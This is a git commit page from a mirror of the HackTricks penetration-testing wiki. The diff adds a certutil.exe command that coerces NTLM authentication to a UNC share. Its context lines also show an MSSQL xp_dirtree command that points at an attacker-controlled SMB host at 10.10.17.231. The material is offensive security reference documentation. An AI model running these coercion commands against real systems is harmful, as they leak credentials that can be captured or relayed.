mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 09:27:32 +00:00
Merge pull request #719 from nuts7/certutil-ntlmcoerce-newtech
Add NTLM auth coerce technique (certutil.exe)
This commit is contained in:
commit
6b6da2aa1d
1 changed files with 8 additions and 0 deletions
|
@ -93,6 +93,14 @@ EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
|
|||
|
||||
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
|
||||
|
||||
### Certutil
|
||||
|
||||
It's possible to use certutil.exe lolbin (Microsoft-signed binary) to coerce NTLM authentication:
|
||||
|
||||
```bash
|
||||
certutil.exe -syncwithWU \\127.0.0.1\share
|
||||
```
|
||||
|
||||
## HTML injection
|
||||
|
||||
### Via email
|
||||
|
|
Loading…
Reference in a new issue